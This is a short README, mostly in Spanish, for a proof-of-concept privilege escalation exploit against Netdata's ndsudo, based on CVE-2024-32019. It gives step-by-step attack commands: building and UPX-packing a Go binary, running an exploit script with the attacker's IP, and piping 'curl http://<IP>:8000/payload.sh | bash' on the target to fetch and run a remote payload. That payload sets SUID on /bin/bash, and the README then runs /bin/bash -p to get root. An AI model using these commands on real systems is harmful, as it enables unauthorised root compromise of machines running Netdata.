
Netdata ndsudo PoC
PoC de Netdata ndsudo
Compila el binario:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
Ejecuta el script bash:
bash exploit.sh <YOUR IP>
En la máquina objetivo ejecuta en un directorio con permisos de escritura:
curl http://<YOUT IP>:8000/payload.sh | bash
Descargará automáticamente el binario nvme, exportará la ruta, ejecutará ndsudo y añadirá SUID a /bin/bash.
Probablemente necesites cambiar la ruta de ndsudo en exploit.sh
Para escalar privilegios solo ejecuta:
/bin/bash -p
El exploit se basa en https://github.com/AzureADTrent/CVE-2024-32019-POC; cuando lo probé, tenía el error:
execve: Exec format error
Por eso decidí crear el mío con Go.